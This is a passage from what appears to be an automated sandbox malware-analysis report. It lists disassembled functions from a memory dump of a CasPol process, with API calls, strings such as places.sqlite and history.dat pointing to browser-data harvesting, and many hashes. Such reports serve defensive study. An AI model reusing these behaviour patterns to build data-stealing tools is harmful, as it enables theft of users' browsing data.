                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                  • API String ID: 2773794195-880857682
                                                                                                                                                                                  • Opcode ID: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                                                                                                                                                                                  • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                  • Opcode Fuzzy Hash: 97e3436b7678629204c95b3b1f0e86467fe5b848d0a0c87f8b2ef990139e8914
                                                                                                                                                                                  • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                  Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1033339047-0
                                                                                                                                                                                  • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                  • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                  Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00444BA5
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$memcmp
                                                                                                                                                                                  • String ID: $$8
                                                                                                                                                                                  • API String ID: 2808797137-435121686
                                                                                                                                                                                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                  Function 00405220 Relevance: 4.6, APIs: 3, Instructions: 88libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045DBE0,0045E298,00000060,00000000), ref: 00405266
                                                                                                                                                                                    • Part of subcall function 00405211: GetProcAddress.KERNEL32(0045DBE0,?,00405282,00000000), ref: 00405217
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressLibraryLoadProc$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 966727022-0
                                                                                                                                                                                  • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                                  • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                                                                                  • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                                                                                                                  Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                                                                                                                                                                                    • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                  • CloseHandle.KERNELBASE(000000FF), ref: 0040E582
                                                                                                                                                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                    • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1979745280-0
                                                                                                                                                                                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                  Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                  • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                  • String ID: history.dat$places.sqlite
                                                                                                                                                                                  • API String ID: 2641622041-467022611
                                                                                                                                                                                  • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                  • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                  Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 839530781-0
                                                                                                                                                                                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                  Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                                                                  • String ID: *.*$index.dat
                                                                                                                                                                                  • API String ID: 1974802433-2863569691
                                                                                                                                                                                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                  Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                  Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                                                                                                                                                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3397143404-0
                                                                                                                                                                                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                  Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1125800050-0
                                                                                                                                                                                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                  Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseHandleSleep
                                                                                                                                                                                  • String ID: }A
                                                                                                                                                                                  • API String ID: 252777609-2138825249
                                                                                                                                                                                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                  Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                  • free.MSVCRT ref: 00409A31
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3056473165-0
                                                                                                                                                                                  • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                                                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                  • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                  Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: BINARY
                                                                                                                                                                                  • API String ID: 2221118986-907554435
                                                                                                                                                                                  • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                  • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                  Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                                  • String ID: /stext
                                                                                                                                                                                  • API String ID: 2081463915-3817206916
                                                                                                                                                                                  • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                  • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                  Function 00409529 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 0040957A
                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1023896661-0
                                                                                                                                                                                  • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                                  • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                                                                                                                  • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                                                                                                                  Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 0040CC98
